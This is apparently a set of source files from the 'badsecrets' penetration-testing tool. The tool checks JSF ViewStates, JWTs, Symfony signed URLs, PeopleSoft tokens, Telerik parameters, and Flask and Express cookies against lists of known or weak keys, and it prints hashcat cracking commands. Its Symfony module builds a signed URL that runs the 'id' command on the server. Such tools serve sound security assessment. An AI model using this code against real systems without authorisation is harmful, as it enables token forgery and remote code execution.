                                "info": "JSF Viewstate (Mojarra 2.2.6 - 2.3.x) AES Encrypted",
                                "compression": True if uncompressed else False,
                            },
                        }

        # myfaces decryption / mac

        myfaces_solved_mac_key = None
        myfaces_solved_mac_algo = None
        myfaces_solved_decryption_key = None
        myfaces_solved_decryption_algo = None
        myfaces_solved_decryption_mode = None
        myfaces_solved_decryption_iv = None

        try:
            ct_bytes = base64.b64decode(jsf_viewstate_value)
        except (binascii.Error, ValueError):
            return False

        # Attempt to solve mac_key
        for l in self.load_resources(["jsf_viewstate_passwords_b64.txt"]):
            with suppress(ValueError):
                password_bytes = base64.b64decode(l.rstrip())
                myfaces_solved_mac_key, myfaces_solved_mac_algo = self.myfaces_mac(ct_bytes, password_bytes)
                if myfaces_solved_mac_key:
                    break

        # Attempt to solve encryption_key
        dec_algos = set()
        if myfaces_solved_mac_algo:
            hash_size = self.hash_sizes[myfaces_solved_mac_algo]
            hash_sizes = [hash_size]
            for algo in self.myfaces_candidate_decryption_algorithms:
                if (len(ct_bytes) - hash_size) % algo.block_size == 0:
                    dec_algos.add(algo)
        else:
            dec_algos = set(self.myfaces_candidate_decryption_algorithms)
            hash_sizes = self.hash_sizes.values()

        for l in self.load_resources(["jsf_viewstate_passwords_b64.txt"]):
            with suppress(ValueError):
                password_bytes = base64.b64decode(l.rstrip())
                (
                    myfaces_solved_decryption_key,
                    myfaces_solved_decryption_algo,
                    myfaces_solved_decryption_mode,
                    myfaces_solved_decryption_iv,
                    compression,
                ) = self.myfaces_decrypt(ct_bytes, password_bytes, dec_algos, hash_sizes)
                if myfaces_solved_decryption_key:
                    break

        if myfaces_solved_mac_key or myfaces_solved_decryption_key:
            if myfaces_solved_decryption_key:
                myfaces_solved_decryption_key = base64.b64encode(myfaces_solved_decryption_key).decode()
            if myfaces_solved_mac_key:
                myfaces_solved_mac_key = base64.b64encode(myfaces_solved_mac_key).decode()
            if myfaces_solved_decryption_iv:
                if myfaces_solved_decryption_iv == b"INVALID":
                    myfaces_solved_decryption_iv = "INVALID"
                else:
                    myfaces_solved_decryption_iv = base64.b64encode(myfaces_solved_decryption_iv).decode()
            return {
                "secret": {
                    "Hash Key": myfaces_solved_mac_key,
                    "Hash Algo": myfaces_solved_mac_algo,
                    "Decryption Key": myfaces_solved_decryption_key,
                    "Decryption Algo": myfaces_solved_decryption_algo,
                    "Decryption Mode": myfaces_solved_decryption_mode,
                    "Decryption IV": myfaces_solved_decryption_iv,
                },
                "details": {
                    "source": jsf_viewstate_value,
                    "info": "JSF Viewstate (Myfaces)",
                    "compression": compression,
                },
            }



import re
import jwt as j
import json
import base64
from badsecrets.base import BadsecretsBase

# XMLDSIG Translation Table

XMLDSIG_table = {
    "http://www.w3.org/2001/04/xmldsig-more#hmac-sha256": "HS256",
    "http://www.w3.org/2001/04/xmldsig-more#hmac-sha384": "HS384",
    "http://www.w3.org/2001/04/xmldsig-more#hmac-sha512": "HS512",
    "http://www.w3.org/2001/04/xmldsig-more#rsa-sha256": "RS256",
    "http://www.w3.org/2001/04/xmldsig-more#rsa-sha384": "RS384",
    "http://www.w3.org/2001/04/xmldsig-more#rsa-sha512": "RS512",
    "http://www.w3.org/2001/04/xmldsig-more#ecdsa-sha256": "ES256",
    "http://www.w3.org/2001/04/xmldsig-more#ecdsa-sha384": "ES384",
    "http://www.w3.org/2001/04/xmldsig-more#ecdsa-sha512": "ES512",
    "http://www.w3.org/2007/05/xmldsig-more#sha256-rsa-MGF1": "PS256",
    "http://www.w3.org/2007/05/xmldsig-more#sha384-rsa-MGF1": "PS384",
    "http://www.w3.org/2007/05/xmldsig-more#sha512-rsa-MGF1": "PS512",
}


class Generic_JWT(BadsecretsBase):
    identify_regex = re.compile(r"eyJ(?:[\w-]*\.)(?:[\w-]*\.)[\w-]*")
    description = {"product": "JSON Web Token (JWT)", "secret": "HMAC/RSA Key", "severity": "HIGH"}

    @staticmethod
    def swap_algorithm(jwt, algorithm):
        header = j.get_unverified_header(jwt)
        header["alg"] = algorithm
        header_encoded = (
            base64.urlsafe_b64encode(json.dumps(header, separators=(",", ":")).encode()).rstrip(b"=").decode()
        )
        _, payload, signature = jwt.split(".")
        new_jwt = f"{header_encoded}.{payload}.{signature}"
        return new_jwt

    def carve_regex(self):
        return re.compile(r"(eyJ(?:[\w-]*\.)(?:[\w-]*\.)[\w-]*)")

    def jwtVerify(self, JWT, key, algorithm):
        try:
            r = j.decode(JWT, key, algorithms=[algorithm], options={"verify_exp": False})
            return r
        except j.exceptions.InvalidSignatureError:
            return None

    def jwtLoad(self, JWT):
        try:
            jwt_headers = j.get_unverified_header(JWT)
        # if the JWT is not well formed, stop here
        except j.exceptions.DecodeError:
            return (None, None, None)
        try:
            algorithm = jwt_headers["alg"]

        # It could be a JWT-like token that is actually a different format, for example a flask cookie
        except KeyError:
            return (None, None, None)

        if algorithm in XMLDSIG_table.keys():
            algorithm = XMLDSIG_table[algorithm]
            JWT = self.swap_algorithm(JWT, algorithm)

        return jwt_headers, algorithm, JWT

    def get_hashcat_commands(self, JWT, *args):
        jwt_headers, algorithm, JWT = self.jwtLoad(JWT)
        if jwt_headers and algorithm and JWT:
            if algorithm[0].lower() != "h":
                return None

            return [
                {
                    "command": f"hashcat -m 16500 -a 0 {JWT}  <dictionary_file>",
                    "description": f"JSON Web Token (JWT) Algorithm: {algorithm}",
                }
            ]

    def check_secret(self, JWT):
        if not self.identify(JWT):
            return None

        jwt_headers, algorithm, JWT = self.jwtLoad(JWT)
        if not jwt_headers or not algorithm or not JWT:
            return None

        if algorithm[0].lower() == "h":
            for l in self.load_resources(["jwt_secrets.txt", "top_100000_passwords.txt"]):
                key = l.strip()

                r = self.jwtVerify(JWT, key, algorithm)
                if r:
                    r["jwt_headers"] = jwt_headers
                    return {"secret": key, "details": r}

        elif algorithm[0].lower() == "r":
            for l in self.load_resources(["jwt_rsakeys_public.txt"]):
                private_key_name = l.split(":")[0]
                public_key = f"{l.split(':')[1]}".rstrip().encode().replace(b"\\n", b"\n")
                r = self.jwtVerify(JWT, public_key, algorithm)
                if r:
                    r["jwt_headers"] = jwt_headers
                    return {"secret": f"Private key Name: {private_key_name}", "details": r}

        return None



#!/usr/bin/env python3
# badsecrets - command line interface
# Black Lantern Security - https://www.blacklanternsecurity.com
# @paulmmueller

from badsecrets.base import check_all_modules, carve_all_modules, hashcat_all_modules
from badsecrets.helpers import print_status
from importlib.metadata import version, PackageNotFoundError
import requests
import argparse
import sys
import os
import re


from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(SCRIPT_DIR))

ascii_art_banner = r"""
 __ )              |                                |         
 __ \    _` |   _` |   __|   _ \   __|   __|   _ \  __|   __| 
 |   |  (   |  (   | \__ \   __/  (     |      __/  |   \__ \ 
____/  \__,_| \__,_| ____/ \___| \___| _|    \___| \__| ____/ 
"""


def print_version():
    try:
        dist_version = version("badsecrets")
    except PackageNotFoundError:
        dist_version = "ersion Unknown (Running w/poetry?)"

    print(f"v{dist_version}\n")


class CustomArgumentParser(argparse.ArgumentParser):
    def error(self, message):
        self.print_usage()
        self.exit(1)


class BaseReport:
    def __init__(self, x):
        self.x = x

    def print_report(self, report_message):
        print(report_message)
        print(f"Detecting Module: {self.x['detecting_module']}\n")
        print(f"Product Type: {self.x['description']['product']}")
        print(f"Product: {self.x['product']}")
        print(f"Secret Type: {self.x['description']['secret']}")
        print(f"Location: {self.x['location']}")


class ReportSecret(BaseReport):
    def report(self):
        self.print_report(print_status("Known Secret Found!\n", color="green", passthru=True))
        print_status(f"Secret: {self.x['secret']}", color="green")
        severity = self.x["description"]["severity"]
        if severity in ["CRITICAL", "HIGH"]:
            severity_color = "red"
        elif severity in ["LOW", "MEDIUM"]:
            severity_color = "yellow"
        elif severity == "INFO":
            severity_color = "blue"
        print_status(f"Severity: {self.x['description']['severity']}", color=severity_color)
        print(f"Details: {self.x['details']}\n")


class ReportIdentify(BaseReport):
    def report(self):
        self.print_report(
            print_status("Cryptographic Product Identified (no vulnerability)\n", color="yellow", passthru=True)
        )
        if self.x["hashcat"] is not None:
            print_hashcat_results(self.x["hashcat"])


def validate_url(
    arg_value,
    pattern=re.compile(
        r"^https?://((?:[A-Z0-9_]|[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_])[\.]?)+(?:[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_]|[A-Z0-9_])(?::[0-9]{1,5})?.*$",
        re.IGNORECASE,
    ),
):
    if not pattern.match(arg_value):
        raise argparse.ArgumentTypeError(print_status("URL is not formatted correctly", color="red"))
    return arg_value


def validate_file(file):
    if not os.path.exists(file):
        raise argparse.ArgumentTypeError(print_status(f"The file {file} does not exist!", color="red"))
    if not os.path.isfile(file):
        raise argparse.ArgumentTypeError(print_status(f"{file} is not a valid file!", color="red"))
    if os.path.getsize(file) > 100 * 1024:  # size in bytes
        raise argparse.ArgumentTypeError(
            print_status(f"The file {file} exceeds the maximum limit of 100KB!", color="red")
        )
    return file


def print_hashcat_results(hashcat_candidates):
    if hashcat_candidates:
        print_status("\nPotential matching hashcat commands:\n", color="yellow")
        for hc in hashcat_candidates:
            print(
                f"Module: [{hc['detecting_module']}] {hc['hashcat_description']} Command: [{hc['hashcat_command']}]\n"
            )


def main():
    global colorenabled
    colorenabled = False
    color_parser = argparse.ArgumentParser(add_help=False)

    color_parser.add_argument(
        "-nc",
        "--no-color",
        action="store_true",
        help="Disable color message in the console",
    )

    args, unknown_args = color_parser.parse_known_args()
    colorenabled = not args.no_color

    parser = CustomArgumentParser(
        description="Check cryptographic products against badsecrets library", parents=[color_parser]
    )

    if colorenabled:
        print_status(ascii_art_banner, color="green")

    else:
        print(ascii_art_banner)
    print_version()

    parser.add_argument(
        "-u",
        "--url",
        type=validate_url,
        help="Use URL Mode. Specified the URL of the page to access and attempt to check for secrets",
    )

    parser.add_argument(
        "-nh",
        "--no-hashcat",
        action="store_true",
        help="Skip the check for compatable hashcat commands when secret isn't found",
    )

    parser.add_argument(
        "-c",
        "--custom-secrets",
        type=validate_file,
        help="include a custom secrets file to load along with the default secrets",
    )

    parser.add_argument("product", nargs="*", type=str, help="Cryptographic product to check for known secrets")

    parser.add_argument(
        "-p",
        "--proxy",
        help="In URL mode, Optionally specify an HTTP proxy",
    )

    parser.add_argument(
        "-a",
        "--user-agent",
        help="In URL mode, Optionally set a custom user-agent",
    )

    parser.add_argument(
        "-r",
        "--allow-redirects",
        action="store_true",
        help="Optionally follow HTTP redirects. Off by default",
    )

    args = parser.parse_args(unknown_args)

    if not args.url and not args.product:
        parser.error(
            print_status(
                "Either supply the product as a positional argument (supply all products for multi-product modules), use --hashcat followed by the product as a positional argument, or use --url mode with a valid URL",
                color="red",
            )
        )
        return

    if args.url and args.product:
        parser.error(print_status("In --url mode, no positional arguments should be used", color="red"))
        return

    allow_redirects = False
    if args.allow_redirects:
        allow_redirects = True

    proxies = None
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}

    custom_resource = None
    if args.custom_secrets:
        custom_resource = args.custom_secrets
        print_status(f"Including custom secrets list [{custom_resource}]\n", color="yellow")

    if args.url:
        headers = {}
        if args.user_agent:
            headers["User-agent"] = args.user_agent

        try:
            res = requests.get(
                args.url, proxies=proxies, headers=headers, verify=False, allow_redirects=allow_redirects
            )
        except (requests.exceptions.ConnectionError, requests.exceptions.ConnectTimeout):
            print_status(f"Error connecting to URL: [{args.url}]", color="red")
            return

        r_list = carve_all_modules(requests_response=res, custom_resource=custom_resource, url=args.url)
        if r_list:
            for r in r_list:
                if r["type"] == "SecretFound":
                    report = ReportSecret(r)
                else:
                    if not args.no_hashcat:
                        hashcat_candidates = hashcat_all_modules(r["product"], detecting_module=r["detecting_module"])
                        if hashcat_candidates:
                            r["hashcat"] = hashcat_candidates
                    report = ReportIdentify(r)
                report.report()
        else:
            print_status("No secrets found :(", color="red")

    else:
        x = check_all_modules(*args.product, custom_resource=custom_resource)
        if x:
            report = ReportSecret(x)
            report.report()
        else:
            print_status("No secrets found :(", color="red")
            if not args.no_hashcat:
                hashcat_candidates = hashcat_all_modules(*args.product)
                if hashcat_candidates:
                    print_hashcat_results(hashcat_candidates)


if __name__ == "__main__":
    main()



import re
import hmac
import base64


from badsecrets.base import BadsecretsBase

# Special thanks to Ambionics Security for their blog post: https://www.ambionics.io/blog/symfony-secret-fragment


class Symfony_SignedURL(BadsecretsBase):
    identify_regex = re.compile(r"http(?:s)?:\/\/[^\/]+\/_fragment[^\s]+_hash=[\/a-zA-z-0-9\+=%]{24,132}")
    description = {"product": "Symfony Signed URL", "secret": "Symfony APP_SECRET", "severity": "CRITICAL"}

    def carve_regex(self):
        return re.compile(r"(http(?:s)?:\/\/[^\/]+\/_fragment[^\s]+_hash=[\/a-zA-z-0-9\+=%]{24,132})")

    def symfonyHMAC(self, url, secret, hash_algorithm):
        return base64.b64encode(hmac.HMAC(secret.encode(), url.encode(), hash_algorithm).digest())

    def symfonyPoC(self, secret, url, hash_algorithm):
        host = url.split("_fragment")[0]
        poc_string = "_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull"
        full_url = f"{host}{poc_string}"
        poc_hash = self.symfonyHMAC(full_url, secret, hash_algorithm)
        poc_url = f"{full_url}&_hash={poc_hash.decode()}"
        return poc_url

    def symfonyVerify(self, value, secret):
        url, url_hash, hash_algorithm = self.symfonyLoad(value)

        generated_hash = self.symfonyHMAC(url, secret, hash_algorithm)
        if generated_hash == url_hash.encode():
            return {
                "hash algorithm": hash_algorithm.__name__.split("openssl_")[1],
                "PoC URL (executes 'id')": self.symfonyPoC(secret, url, hash_algorithm),
            }
        return False

    def symfonyLoad(self, value):
        url, url_hash = value.split("&_hash=")
        for hash_algorithm_str in self.search_dict(self.hash_sizes, len(base64.b64decode(url_hash))):
            hash_algorithm = self.hash_algs[hash_algorithm_str]
        return url, url_hash, hash_algorithm

    def get_hashcat_commands(self, signed_url, *args):
        url, url_hash, hash_algorithm = self.symfonyLoad(signed_url)
        hash_algorithm_str = hash_algorithm.__name__.split("_")[1]
        hashcat_mode = None

        if hash_algorithm_str == "sha1":
            hashcat_mode = "150"

        elif hash_algorithm_str == "sha256":
            hashcat_mode = "1450"

        if hashcat_mode:
            return [
                {
                    "command": f"hashcat -m {hashcat_mode} -a 0 {base64.b64decode(url_hash).hex()}:{url.encode().hex()} --hex-salt  <dictionary_file>",
                    "description": f"Symfony Signed URL Algorithm: [{hash_algorithm_str }]",
                }
            ]

    def check_secret(self, signed_url):
        if not self.identify(signed_url):
            return None
        for l in self.load_resources(["symfony_appsecret.txt"]):
            password = l.rstrip()
            r = self.symfonyVerify(value=signed_url, secret=password)
            if r:
                return {"secret": password, "details": r}
        return None



import zlib
import base64
import hashlib
from badsecrets.base import BadsecretsBase, generic_base64_regex


class Peoplesoft_PSToken(BadsecretsBase):
    identify_regex = generic_base64_regex
    description = {"product": "Peoplesoft PS_TOKEN", "secret": "Peoplesoft Secret", "severity": "HIGH"}

    def peoplesoft_load(self, PS_TOKEN_B64):
        PS_TOKEN = base64.b64decode(PS_TOKEN_B64)
        SHA1_mac = PS_TOKEN[44:64]
        try:
            PS_TOKEN_DATA = zlib.decompress(PS_TOKEN[76:])
        except zlib.error:
            return None, None
        return PS_TOKEN_DATA, SHA1_mac

    def check_secret(self, PS_TOKEN_B64):
        if not self.identify(PS_TOKEN_B64):
            return None

        PS_TOKEN_DATA, SHA1_mac = self.peoplesoft_load(PS_TOKEN_B64)
        if not PS_TOKEN_DATA or not SHA1_mac:
            return None

        username = PS_TOKEN_DATA[21 : 21 + PS_TOKEN_DATA[20]].replace(b"\x00", b"").decode()

        # try no password
        h = hashlib.sha1(PS_TOKEN_DATA)
        if h.digest() == SHA1_mac:
            return {"secret": f"Username: {username} Password: BLANK PASSWORD!", "details": None}

        for l in set(list(self.load_resources(["peoplesoft_passwords.txt", "top_100000_passwords.txt"]))):
            password = l.strip()

            h = hashlib.sha1(PS_TOKEN_DATA + password.encode("utf_16_le", errors="ignore"))
            if h.digest() == SHA1_mac:
                return {"secret": f"Username: {username} Password: {password}", "details": None}

        return None

    def get_hashcat_commands(self, PS_TOKEN_B64, *args):
        PS_TOKEN_DATA, SHA1_mac = self.peoplesoft_load(PS_TOKEN_B64)

        if not PS_TOKEN_DATA or not SHA1_mac:
            return None
        return [
            {
                "command": f"hashcat -m 13500 -a 0 {SHA1_mac.hex()}:{PS_TOKEN_DATA.hex()}  <dictionary_file>",
                "description": f"Peoplesoft PS_TOKEN Password",
            }
        ]



import re

from badsecrets.base import BadsecretsBase
from badsecrets.modules.aspnet_viewstate import ASPNET_Viewstate

# Reference: https://blog.sorcery.ie/posts/higherlogic_rce/


class ASPNET_vstate(BadsecretsBase):
    identify_regex = re.compile(r"^H4sI.+$")
    description = {"product": "ASP.NET Compressed Vstate", "secret": "unprotected", "severity": "CRITICAL"}

    def carve_regex(self):
        return re.compile(r"<input[^>]+__VSTATE\"\s*value=\"(.*?)\"")

    def get_product_from_carve(self, regex_search):
        product = regex_search.groups()[0]
        if len(product) == 0:
            return "EMPTY '__VSTATE' FORM FIELD"
        return product

    def check_secret(self, compressed_vstate):
        if not self.identify(compressed_vstate):
            return None

        uncompressed = self.attempt_decompress(compressed_vstate)
        if uncompressed and ASPNET_Viewstate.valid_preamble(uncompressed):
            r = {"source": compressed_vstate, "info": "ASP.NET Vstate (Unprotected, Compressed)"}
            return {"secret": "UNPROTECTED (compressed)", "details": r}



#!/usr/bin/env python3
# badsecrets - python 'blacklist3r' tool
# Inspired by blacklist3r  - https://github.com/NotSoSecure/Blacklist3r\n")
# Black Lantern Security - https://www.blacklanternsecurity.com")
# @paulmmueller

import re
import os
import sys
import argparse
import requests
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(SCRIPT_DIR))

from badsecrets import modules_loaded

ASPNET_Viewstate = modules_loaded["aspnet_viewstate"]


def check_viewstate(viewstate, generator):
    bs_vs = ASPNET_Viewstate()
    r = bs_vs.check_secret(viewstate, generator)
    return r


def print_result(r):
    print("Matching MachineKeys found!")
    print(r["secret"])


def validate_viewstate(arg_value, pattern=re.compile(r"^(?:[A-Za-z0-9+\/=%]+)$")):
    if not pattern.match(arg_value):
        raise argparse.ArgumentTypeError("Viewstate is not formatted correctly")
    return arg_value


def validate_generator(arg_value, pattern=re.compile(r"^(?:[A-Fa-f0-9]+)$")):
    if not pattern.match(arg_value):
        raise argparse.ArgumentTypeError("Generator is not formatted correctly")
    return arg_value


def validate_url(
    arg_value,
    pattern=re.compile(
        r"^https?://((?:[A-Z0-9_]|[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_])[\.]?)+(?:[A-Z0-9_][A-Z0-9\-_]*[A-Z0-9_]|[A-Z0-9_])(?::[0-9]{1,5})?.*$",
        re.IGNORECASE,
    ),
):
    if not pattern.match(arg_value):
        raise argparse.ArgumentTypeError("URL is not formatted correctly")
    return arg_value


def main():
    viewstate = None
    generator = "0000"

    generator_regex = re.compile(r'<input.+__VIEWSTATEGENERATOR"\svalue="(\w+)"')
    viewstate_regex = re.compile(r'<input.+__VIEWSTATE"\svalue="(.+)"')

    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        "--url",
        type=validate_url,
        help="The URL of the page to access and attempt to pull viewstate and generator from",
    )
    parser.add_argument("-v", "--viewstate", type=validate_viewstate)
    parser.add_argument("-g", "--generator", type=validate_generator)

    parser.add_argument(
        "-p",
        "--proxy",
        help="Optionally specificy an HTTP proxy",
    )

    parser.add_argument(
        "-a",
        "--user-agent",
        help="Optionally set a custom user-agent",
    )

    args = parser.parse_args()

    if not args.viewstate and not args.url:
        parser.error("One of --url or --viewstate is required")
        return

    if (args.url and args.viewstate) or (args.url and args.generator):
        parser.error("--viewstate/--generator options and --url option are mutually exclusive")
        return

    proxies = None
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}

    if args.url:
        headers = {}
        if args.user_agent:
            headers["User-agent"] = args.user_agent

        try:
            res = requests.get(args.url, proxies=proxies, headers=headers, verify=False)
        except (requests.exceptions.ConnectionError, requests.exceptions.ConnectTimeout):
            print(f"Error connecting to URL: [{args.url}]")
            return
        resp_body = urllib.parse.unquote(res.text)
        generator_match = generator_regex.search(resp_body)
        viewstate_match = viewstate_regex.search(resp_body)
        if generator_match and viewstate_match:
            viewstate = viewstate_match.group(1)
            generator = generator_match.group(1)
        else:
            print(f"Did not find viewstate in repsonse from URL [{args.url}]")
            return

    elif args.viewstate:
        viewstate = args.viewstate
        if args.generator:
            generator = args.generator
        else:
            print("Warning: non-encrypted viewstates will fail without --generator value")

    r = check_viewstate(viewstate, generator)
    if r:
        print_result(r)
    else:
        print("Matching MachineKeys NOT found")


if __name__ == "__main__":
    print("badsecrets - python 'blacklist3r' tool\n")
    main()



import re
import hmac
import base64
import binascii
import urllib.parse
from Crypto.Cipher import AES
from Crypto.Protocol import KDF
from contextlib import suppress
from Crypto.Util.Padding import pad
from badsecrets.helpers import unpad
from badsecrets.base import BadsecretsBase
from badsecrets.helpers import Csharp_pbkdf1
from badsecrets.errors import Telerik_EncryptionKey_Exception

telerik_hardcoded_salt = [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1]


class Telerik_EncryptionKey(BadsecretsBase):
    identify_regex = re.compile(r"^(?:[A-Za-z0-9+\/=%]{32,})$")
    description = {
        "product": "Telerik DialogParameters",
        "secret": "Telerik.Web.UI.DialogParametersEncryptionKey",
        "severity": "MEDIUM",
    }

    def carve_regex(self):
        return re.compile(r"{\"SerializedParameters\":\"([^\"]*)\"")

    def prepare_keylist(self, include_machinekeys=False):
        if include_machinekeys:
            for l in self.load_resources(["aspnet_machinekeys.txt"]):
                with suppress(ValueError):
                    vkey, ekey = l.rstrip().split(",")
                    if ekey:
                        yield ekey
        for l in self.load_resources(["telerik_encryption_keys.txt"]):
            ekey = l.strip()
            yield ekey

    def telerik_derivekeys(self, ekey, key_derive_mode):
        if key_derive_mode == "PBKDF1_MS":
            return self.telerik_derivekeys_PBKDF1_MS(ekey)
        elif key_derive_mode == "PBKDF2":
            return self.telerik_derivekeys_PBKDF2(ekey)
        else:
            raise Telerik_EncryptionKey_Exception("Invalid key_derive_mode")

    def telerik_derivekeys_PBKDF1_MS(self, ekey):
        csharp_pbkdf1 = Csharp_pbkdf1(ekey.encode(), bytes(telerik_hardcoded_salt), 100)
        derivedKey = csharp_pbkdf1.GetBytes(32)
        derivedIV = csharp_pbkdf1.GetBytes(16)
        return derivedKey, derivedIV

    def telerik_derivekeys_PBKDF2(self, ekey):
        pbkdf1 = KDF.PBKDF2(ekey.encode(), bytes(telerik_hardcoded_salt), dkLen=48)
        derivedKey = pbkdf1[:32]
        derivedIV = pbkdf1[32:]
        return derivedKey, derivedIV

    @classmethod
    def telerik_encrypt(self, derivedKey, derivedIV, dialog_parameters_pt):
        cipher = AES.new(derivedKey, AES.MODE_CBC, derivedIV)
        dialog_parameters_b64 = base64.b64encode(dialog_parameters_pt.encode()).decode().encode("utf-16le")
        dialog_parameters_raw = pad(dialog_parameters_b64, AES.block_size)
        encrypted_bytes = cipher.encrypt(dialog_parameters_raw)
        return base64.b64encode(encrypted_bytes).decode()

    @classmethod
    def telerik_decrypt(self, derivedKey, derivedIV, dp_enc):
        if not len(dp_enc) > 0:
            return None

        cipher = AES.new(derivedKey, AES.MODE_CBC, derivedIV)
        try:
            pt_raw = cipher.decrypt(dp_enc)
        except ValueError:
            return None
        original_bytes = unpad(pt_raw)
        try:
            decoded_bytes = original_bytes.decode("utf-16le")
        except UnicodeDecodeError:
            return None
        try:
            dialog_parameters = base64.b64decode(decoded_bytes).decode()
        except ValueError:
            return None

        return dialog_parameters

    def check_secret(self, dialogParameters_raw, key_derive_mode=None, include_machinekeys=False):
        if not key_derive_mode:
            key_derive_modes = ["PBKDF1_MS", "PBKDF2"]
        else:
            key_derive_modes = [key_derive_mode]

        if not self.identify(dialogParameters_raw):
            return None

        dialogParametersB64 = urllib.parse.unquote(dialogParameters_raw)
        try:
            dp_enc = base64.b64decode(dialogParametersB64[:-44])
        except binascii.Error:
            return None
        for key_derive_mode in key_derive_modes:
            for ekey in self.prepare_keylist(include_machinekeys=include_machinekeys):
                derivedKey, derivedIV = self.telerik_derivekeys(ekey, key_derive_mode)
                dialog_parameters = self.telerik_decrypt(derivedKey, derivedIV, dp_enc)
                if not dialog_parameters:
                    continue
                if dialog_parameters.isascii():
                    return {
                        "secret": ekey,
                        "details": {"DialogParameters": dialog_parameters},
                    }
        return None

    def encryptionkey_probe_generator(self, hash_key, key_derive_mode, include_machinekeys=False):
        test_string = b"AAAAAAAAAAAAAAAAAAAA"
        dp_enc = base64.b64encode(test_string).decode()

        for ekey in self.prepare_keylist(include_machinekeys=include_machinekeys):
            derivedKey, derivedIV = self.telerik_derivekeys(ekey, key_derive_mode)
            ct = self.telerik_encrypt(derivedKey, derivedIV, dp_enc)
            h = hmac.new(hash_key.encode(), ct.encode(), self.hash_algs["SHA256"])
            yield (f"{ct}{base64.b64encode(h.digest()).decode()}", ekey)



# flask_secret_keys wordlist shamelessly copied from https://github.com/Paradoxis/Flask-Unsign <3 <3 <3

import re
from flask_unsign import verify as flaskVerify
from badsecrets.base import BadsecretsBase


class Flask_SignedCookies(BadsecretsBase):
    identify_regex = re.compile(r"\.?e[Jy](?:[\w-]*\.)(?:[\w-]*\.)[\w-]*")
    description = {"product": "Flask Signed Cookie", "secret": "Flask Password", "severity": "HIGH"}

    def check_secret(self, flask_cookie):
        if not self.identify(flask_cookie):
            return None
        for l in set(list(self.load_resources(["flask_secret_keys.txt", "top_100000_passwords.txt"]))):
            password = l.rstrip()
            r = flaskVerify(value=flask_cookie, secret=password)
            if r:
                return {"secret": password, "details": r}
        return None

    def get_hashcat_commands(self, flask_cookie, *args):
        return [
            {
                "command": f"hashcat -m 29100 -a 0 {flask_cookie} <dictionary_file>",
                "description": f"Flask Signed Cookie",
                "severity": "HIGH",
            }
        ]



import re
import hmac
import base64
import binascii
from contextlib import suppress
from badsecrets.base import BadsecretsBase


def no_padding_urlsafe_base64_decode(enc):
    return base64.urlsafe_b64decode(enc + "=" * (-len(enc) % 4))


def no_padding_urlsafe_base64_encode_cs(enc):
    return base64.urlsafe_b64encode(enc).decode().rstrip("=").replace("+", "-").replace("/", "_")


class ExpressSignedCookies_CS(BadsecretsBase):
    check_secret_args = 2
    identify_regex = re.compile(r"\w{1,200}\=eyJ[A-Za-z0-9=\\_]{4,512}")
    signature_regex = re.compile(r"^[A-Za-z0-9_-]{27}$")
    description = {
        "product": "Express.js Signed Cookie (cookie-session)",
        "secret": "Express.js Secret (cookie-session)",
        "severity": "HIGH",
    }

    def carve_regex(self):
        return re.compile(r"(\w{1,64})=([^;]{4,512});.{0,100}?\1\.sig=([^;]{27,86})")

    def get_product_from_carve(self, regex_search):
        return f"Data Cookie: [{regex_search.groups()[0]}={regex_search.groups()[1]}] Signature Cookie: [{regex_search.groups()[2]}]"

    def carve_to_check_secret(self, s):
        if len(s.groups()) == 3:
            r = self.check_secret(f"{s.groups()[0]}={s.groups()[1]}", s.groups()[2])
            return r

    def expressHMAC(self, payload, secret, hash_algorithm):
        return no_padding_urlsafe_base64_encode_cs(
            hmac.HMAC(secret.encode(), payload.encode(), hash_algorithm).digest()
        )

    def expressVerify_cs(self, payload, signature, secret):
        with suppress(binascii.Error):
            for hash_algorithm_str in self.search_dict(
                self.hash_sizes, len(no_padding_urlsafe_base64_decode(signature))
            ):
                hash_algorithm = self.hash_algs[hash_algorithm_str]
                generated_hash = self.expressHMAC(payload, secret, hash_algorithm)
                if generated_hash == signature:
                    return {
                        "hash algorithm": hash_algorithm.__name__.split("openssl_")[1],
                    }
        return False

    def check_secret(self, express_signed_cookie_data, *args):
        if not self.identify(express_signed_cookie_data):
            return None

        sig = self.resolve_args(args)

        if not sig:
            return False

        for l in set(list(self.load_resources(["express_session_secrets.txt", "top_100000_passwords.txt"]))):
            secret = l.rstrip()
            r = self.expressVerify_cs(express_signed_cookie_data, sig, secret)
            if r:
                return {
                    "secret": secret,
                    "details": r,
                    "product": f"Data Cookie: [{express_signed_cookie_data}] Signature Cookie: [{sig}]",
                }

    def resolve_args(self, args):
        if len(args) != 1:
            return None

        if self.signature_regex.match(args[0]):
            return args[0]
